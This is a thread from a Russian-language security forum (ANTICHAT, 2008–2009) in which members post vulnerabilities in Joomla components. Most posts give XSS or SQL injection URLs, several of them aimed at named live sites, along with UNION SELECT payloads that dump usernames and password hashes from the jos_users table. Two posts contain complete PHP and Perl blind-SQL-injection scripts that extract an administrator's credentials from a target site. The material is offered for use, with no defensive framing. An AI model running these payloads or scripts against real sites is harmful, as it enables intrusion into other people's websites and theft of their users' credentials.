HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS в модуле com_frontpage в параметре fontstyle.
  #1  
Старый 19.12.2008, 18:24
foopi
Познающий
Регистрация: 26.10.2008
Сообщений: 50
Провел на форуме:
536527

Репутация: 62
Отправить сообщение для foopi с помощью ICQ
По умолчанию XSS в модуле com_frontpage в параметре fontstyle.

Код:
Код:
/index.php?option=com_frontpage&Itemid=1&fontstyle=%22%3E%3Cscript%3Ealert(/Xa-xa/)%3C/script%3E
Примеры:
Код:
http://www.l2hell.ru/index.php?option=com_frontpage&Itemid=1&fontstyle=%22%3E%3Cscript%3Ealert(/Xa-xa/)%3C/script%3E
Код:
http://uasos.com/index.php?Itemid=1&limit=14&limitstart=10696&option=com_frontpage&fontstyle=%22%3E%3Cscript%3Ealert(/Xa-xa/)%3C/script%3E
 
Ответить с цитированием

Joomla Component com_hbssearch(r_type) Blind SQL-injection
  #2  
Старый 22.12.2008, 16:52
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию Joomla Component com_hbssearch(r_type) Blind SQL-injection

Joomla Component com_hbssearch(r_type) Blind SQL-injection

http://localhost/Path/index.php?option=com_hbssearch&task=showhoteldetai ls&id=1&r_type=[SQL-vulnerability]

LiveDEMO:

http://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhoteldetai ls&id=4&r_type=1 and substring(@@version,1,1)=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&st ar=&child1=0&adult1=1&Itemid=54 -->FALSE

http://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhoteldetai ls&id=4&r_type=1 and substring(@@version,1,1)=5&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&st ar=&child1=0&adult1=1&Itemid=54 -->TRUE

# milw0rm.com [2008-12-21]

Joomla Component com_tophotelmodule(id) Blind SQL-injection

Example:
http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhotel details&id=[SQL-vulnerability]


LiveDEMO:

http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhotel details&id=1 and substring(@@version,1,1)=4 -->FALSE

http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhotel details&id=1 and substring(@@version,1,1)=5 -->TRUE

# milw0rm.com [2008-12-21]

Последний раз редактировалось Rubaka; 22.12.2008 в 16:55..
 
Ответить с цитированием

  #3  
Старый 24.12.2008, 02:32
swt1
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466

Репутация: 96
По умолчанию

Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability
____________
http://www.milw0rm.com/exploits/7568

:::::::

Joomla Component com_lowcosthotels (id) Blind SQL Injection Vulnerability
____________
http://www.milw0rm.com/exploits/7567
 
Ответить с цитированием

  #4  
Старый 25.12.2008, 00:36
swt1
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466

Репутация: 96
По умолчанию

Joomla Component Ice Gallery 0.5b2 (catid) Blind SQL Injection Vuln
_________
http://www.milw0rm.com/exploits/7572

::::

Joomla Component Live Ticker 1.0 (tid) Blind SQL Injection Vuln
_________
http://www.milw0rm.com/exploits/7573

:::::

Joomla Component mdigg 2.2.8 (category) SQL Injection Vuln
__________
http://www.milw0rm.com/exploits/7574

:::::

Joomla Component 5starhotels (id) SQL Injection Exploit
__________
http://www.milw0rm.com/exploits/7575

Последний раз редактировалось swt1; 25.12.2008 в 00:41..
 
Ответить с цитированием

  #5  
Старый 05.01.2009, 23:54
swt1
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466

Репутация: 96
По умолчанию

Joomla com_phocadocumentation (id) Remote SQL Injection Exploit
__________
http://www.milw0rm.com/exploits/7670

:::::

Joomla com_na_newsdescription (newsid) SQL Injection Exploit

__________
http://www.milw0rm.com/exploits/7669

:::::
__________
Joomla Component simple_review 1.x SQL Injection Vulnerability

:::::

http://www.milw0rm.com/exploits/7667

Последний раз редактировалось swt1; 05.01.2009 в 23:57..
 
Ответить с цитированием

  #6  
Старый 10.01.2009, 18:17
eLWAux
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568

Репутация: 2399


Отправить сообщение для eLWAux с помощью ICQ
По умолчанию

Компонент ReMOSitory 341RE (com_remository)
XSS

/index.php?option=com_remository&Itemid=1&func=sele ct_XSS&

Пример:

http://studik.lviv.ua/index.php?option=com_remository&Itemid=44&func=sel ect_<img src="" onerror=alert('xss') xxx&id=1&orderby=2&page=2
 
Ответить с цитированием

  #7  
Старый 14.01.2009, 10:08
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Двиг: Joomla
Компонент: com_gigcal(gigcal_gigs_id)
Уязвимость: SQL-injection

Код:
http://localhost/Path/index.php?option=com_gigcal&task=details&gigcal_gigs_id='+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12+from+jos_users/*
 
Ответить с цитированием

  #8  
Старый 14.01.2009, 11:50
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Joomla

Компонент: Fantasytournament (com_fantasytournament)
Version: 2009.1.5
Уязвимость: SQL-injection

Код:
http://localhost/Path/index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6+from+jos_users--
Код:
http://localhost/Path/index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users--
Код:
http://localhost/Path/index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=-63+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users--
Author:"Adrian Gray"

Компонент: Camelcitydb2 (com_camelcitydb2)
Version: 2.2
Уязвимость: SQL-injection

Код:
http://localhost/Path/index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11+from+jos_users--&view=detail&Itemid=15
Author:"Noel Hunter"

Последний раз редактировалось z00MAN; 14.01.2009 в 11:55..
 
Ответить с цитированием

  #9  
Старый 15.01.2009, 21:04
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Joomla

Компонент: com_Eventing 1.6.x
Уязвимость: SQL Injection Exploit
PHP код:
<?php
ini_set
("max_execution_time",0);
print_r('
##############################################################################
#
#                Joomla com_Eventing Blind SQL Injection Exploit
#
#                             ===  Cyb3R-1st  ===
#                           cyb3r-1st@hormail.com
#                      == Writing by Stack - thx m8 - ==
#
# usage : php file.php "http://site.me/index.php?option=com_eventing&catid=1"
#
##############################################################################
'
);
if (
$argc 1) {
$url $argv[1];
$r strlen(file_get_contents($url."+and+1=1--"));
echo 
"\nExploiting:\n";
$w strlen(file_get_contents($url."+and+1=0--"));
$t abs((100-($w/$r*100)));
echo 
"Username: ";
for (
$i=1$i <= 30$i++) {
$laenge strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
   if (
abs((100-($laenge/$r*100))) > $t-1) {
      
$count $i;
      
$i 30;
   }
}
for (
$j 1$j $count$j++) {
   for (
$i 46$i <= 122$i=$i+2) {
      if (
$i == 60) {
         
$i 98;
      }
      
$laenge strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (
abs((100-($laenge/$r*100))) > $t-1) {
         
$laenge strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (
abs((100-($laenge/$r*100))) > $t-1) {
            echo 
chr($i-1);
         } else {
            echo 
chr($i);
         }
         
$i 122;
      }
   }
}
echo 
"\nPassword: ";
for (
$j 1$j <= 49$j++) {
   for (
$i 46$i <= 102$i=$i+2) {
      if (
$i == 60) {
         
$i 98;
      }
      
$laenge strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (
abs((100-($laenge/$r*100))) > $t-1) {
         
$laenge strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (
abs((100-($laenge/$r*100))) > $t-1) {
            echo 
chr($i-1);
         } else {
            echo 
chr($i);
         }
         
$i 102;
      }
   }
}

?>

# milw0rm.com [2009-01-15]
Компонент: RD-Autos 1.5.2
Уязвимость: SQL Injection Vulnerability

[~] Exploit
Код:
/index.php?option=com_rdautos&view=category&id=[SQL]&Itemid=54
[~] Example
Код:
/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54

Последний раз редактировалось z00MAN; 16.01.2009 в 16:22..
 
Ответить с цитированием

  #10  
Старый 20.01.2009, 12:12
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Joomla

Компонент: Gigcal 1.x
Уязвимость: SQL Injection Vulnerability
Exploit :
Код:
http://localhost/index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
Компонент: com_pccookbook
Уязвимость: Blind SQL Injection Exploit

Код HTML:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                        \n";                                                             
  print "  #########################################################################\n";
  print "  #   \n";
  print "  #            Joomla com_pccookbook Blind sql injection exploit \n";
  print "  #   \n";
  print "  #                              Cyb3R-1sT \n";
  print "  #                       cyb3r-1st[at]hotmail.com \n";
  print "  #   \n";
  print "  #                Usage:perl file.pl host path <options> \n";
  print "  #            example: perl file.pl www.host.com /joomla/ -a 7 \n";
  print "  #   \n";
  print "  #                           Options:  -a id \n";
  print "  #   \n";
  print "  #########################################################################\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $aid     = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
  $userid = $options{"u"};
}

if($options{"a"})
{
  $aid = $options{"a"};
}

syswrite(STDOUT, "[~] Password: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $aid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $aid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid   = shift;
  my $aid   = shift;
  my $i     = shift;
  my $h     = shift;
 
  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index.php?option=com_pccookbook&page=viewrecipe&recipe_id=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
 
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
 
  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "Ingredients";
 
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}
Компонент: com_news
Уязвимость: SQL Injection Vulnerability

Exploit:
Код:
http://localhost/index.php?option=com_news&id=-148+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users--
Компонент: com_waticketsystem
Уязвимость: Blind SQL Injection Exploit
PHP код:
<?php
ini_set
("max_execution_time",0);
print_r('
##############################################################################
#
#                Joomla com_waticketsystem Blind SQL Injection Exploit
#
#                             ===  Cyb3R-1st  ===
#                           cyb3r-1st@hormail.com
#                            == inject0r5 t3am ==
#
#    usegae : php file.php "http://site/index.php?option=com_waticketsystem&act=category&catid=1"
#
##############################################################################
'
);
if (
$argc 1) {
$url $argv[1];
$r strlen(file_get_contents($url."+and+1=1--"));
echo 
"\nExploiting:\n";
$w strlen(file_get_contents($url."+and+1=0--"));
$t abs((100-($w/$r*100)));
echo 
"Username: ";
for (
$i=1$i <= 30$i++) {
$laenge strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
   if (
abs((100-($laenge/$r*100))) > $t-1) {
      
$count $i;
      
$i 30;
   }
}
for (
$j 1$j $count$j++) {
   for (
$i 46$i <= 122$i=$i+2) {
      if (
$i == 60) {
         
$i 98;
      }
      
$laenge strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (
abs((100-($laenge/$r*100))) > $t-1) {
         
$laenge strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (
abs((100-($laenge/$r*100))) > $t-1) {
            echo 
chr($i-1);
         } else {
            echo 
chr($i);
         }
         
$i 122;
      }
   }
}
echo 
"\nPassword: ";
for (
$j 1$j <= 49$j++) {
   for (
$i 46$i <= 102$i=$i+2) {
      if (
$i == 60) {
         
$i 98;
      }
      
$laenge strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (
abs((100-($laenge/$r*100))) > $t-1) {
         
$laenge strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (
abs((100-($laenge/$r*100))) > $t-1) {
            echo 
chr($i-1);
         } else {
            echo 
chr($i);
         }
         
$i 102;
      }
   }
}

?>
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Уязвимости CMS / форумов 49 02.04.2015 17:48
Обзор бесплатных Cms em00s7 PHP 16 03.07.2009 13:13
Cms Cawabunga PHP 20 05.08.2007 00:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ